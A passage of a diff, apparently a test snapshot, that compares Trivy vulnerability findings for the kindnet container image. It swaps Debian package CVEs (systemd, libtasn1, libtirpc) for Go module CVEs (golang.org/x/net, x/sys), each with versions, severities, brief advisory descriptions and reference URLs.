"https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", - "https://linux.oracle.com/cve/CVE-2022-4415.html", - "https://linux.oracle.com/errata/ELSA-2023-0954.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", - "https://ubuntu.com/security/notices/USN-5928-1", - "https://www.cve.org/CVERecord?id=CVE-2022-4415", - "https://www.openwall.com/lists/oss-security/2022/12/21/3", - ], - }, - "category": "Vulnerability", - "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0954", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-4415", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149063", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2155515", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0954", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-4415.html", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5928-1", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/12/21/3", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4392", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", - "references": [ - "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", - "http://www.openwall.com/lists/oss-security/2013/10/01/9", - "https://access.redhat.com/security/cve/CVE-2013-4392", - "https://bugzilla.redhat.com/show_bug.cgi?id=859060", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", - "https://www.cve.org/CVERecord?id=CVE-2013-4392", - ], - }, - "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://security.gentoo.org/glsa/202209-26", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "247.3-7", - "packageName": "libsystemd0", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41723", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "4.16.0-2+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.16.0-2", - "packageName": "libtasn1-6", + "fixedVersion": "0.0.0-20210428140749-89ef3d95e781", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-31525", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "https://access.redhat.com/security/cve/CVE-2021-31525", + "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", + "https://github.com/golang/go/issues/45710", + "https://go.dev/cl/313069", + "https://go.dev/issue/45710", + "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", + "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", + "https://linux.oracle.com/cve/CVE-2021-31525.html", + "https://linux.oracle.com/errata/ELSA-2021-3076.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", + "https://pkg.go.dev/vuln/GO-2022-0236", + "https://security.gentoo.org/glsa/202208-02", + "https://www.cve.org/CVERecord?id=CVE-2021-31525", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", + "description": "net/http in Go before 1.15.12 and 1.16.x before 1.16.4 allows remote attackers to cause a denial of service (panic) via a large header to ReadRequest or ReadResponse. Server, Transport, and Client can each be affected in some configurations.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", + "name": "golang: net/http: panic in ReadRequest and ReadResponse when reading a very large header", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", - }, - { - "type": "URL", - "value": "https://bugs.gentoo.org/866237", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - }, - { - "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-31525", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://access.redhat.com/security/cve/CVE-2021-31525", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://github.com/advisories/GHSA-h86h-8ppg-mxmh", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://github.com/golang/go/issues/45710", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "https://go.dev/cl/313069", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://go.dev/issue/45710", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://go.googlesource.com/net/+/89ef3d95e781148a0951956029c92a211477f7f9", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "https://groups.google.com/g/golang-announce/c/cu9SP4eSXMc", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "https://linux.oracle.com/cve/CVE-2021-31525.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "https://linux.oracle.com/errata/ELSA-2021-3076.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ISRZZ6NY5R2TBYE72KZFOCO25TEUQTBF/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-31525", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://pkg.go.dev/vuln/GO-2022-0236", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://security.gentoo.org/glsa/202208-02", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-31525", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc-common", + "fixedVersion": "0.4.0", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20201110031124-69a78807bb2b", + "packageName": "golang.org/x/net", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8400.html", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8400", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46828.html", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8400.html", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-33", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221007-0004/", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5538-1", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46828", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5200", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.3.1-1+deb11u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46828", - "installedVersion": "1.3.1-1", - "packageName": "libtirpc3", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20201112073958-5cba982894dd", + "packageName": "golang.org/x/sys", "references": [ - "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", - "https://access.redhat.com/errata/RHSA-2022:8400", - "https://access.redhat.com/security/cve/CVE-2021-46828", - "https://bugzilla.redhat.com/2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2109352", - "https://bugzilla.redhat.com/show_bug.cgi?id=2118157", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46828", - "https://errata.almalinux.org/9/ALSA-2022-8400.html", - "https://errata.rockylinux.org/RLSA-2022:8400", - "https://linux.oracle.com/cve/CVE-2021-46828.html", - "https://linux.oracle.com/errata/ELSA-2022-8400.html", - "https://lists.debian.org/debian-lts-announce/2022/08/msg00004.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46828", - "https://security.gentoo.org/glsa/202210-33", - "https://security.netapp.com/advisory/ntap-20221007-0004/", - "https://ubuntu.com/security/notices/USN-5538-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46828", - "https://www.debian.org/security/2022/dsa-5200", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "In libtirpc before 1.3.3rc1, remote attackers could exhaust the file descriptors of a process that uses libtirpc because idle TCP connections are mishandled. This can, in turn, lead to an svc_run infinite loop without accepting new connections.", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "libtirpc: DoS vulnerability with lots of connections", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46828", - }, - { - "type": "URL", - "value": "http://git.linux-nfs.org/?p=steved/libtirpc.git;a=commit;h=86529758570cef4c73fb9b9c4104fdc510f701ed", + "value": "https://avd.aquasec.com/nvd/cve-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8400", + "value": "https://access.redhat.com/security/cve/CVE-2022-29526", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46828", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2109352", + "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", }, { "type": "URL", - "value": 